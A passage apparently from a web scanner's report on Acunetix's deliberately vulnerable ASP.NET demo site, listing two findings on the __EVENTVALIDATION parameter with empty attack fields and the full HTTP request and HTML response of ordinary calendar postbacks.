was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8445&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAZ2oeDtsIZGRkwZBD46EUK6fliDw5fVkVfZ4gjhA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKskaT4AwLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBVuvZJ0uIAZEZUWGs6E8sOAH0x8B
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:50 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgAAZ2oeDtsIZGRkwZBD46EUK6fliDw5fVkVfZ4gjhA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKskaT4AwLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBVuvZJ0uIAZEZUWGs6E8sOAH0x8B" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:White" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8296&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBA2roImdoIZGRkjaw0ujs2tzIknTvXhyHo%2BVNg1iU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKSlOPXAgLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAk%2FnSiejc3xjYqNqxWNbwHQyfuh7
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:38:07 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBA2roImdoIZGRkjaw0ujs2tzIknTvXhyHo+VNg1iU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKSlOPXAgLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAk/nSiejc3xjYqNqxWNbwHQyfuh7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:White" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 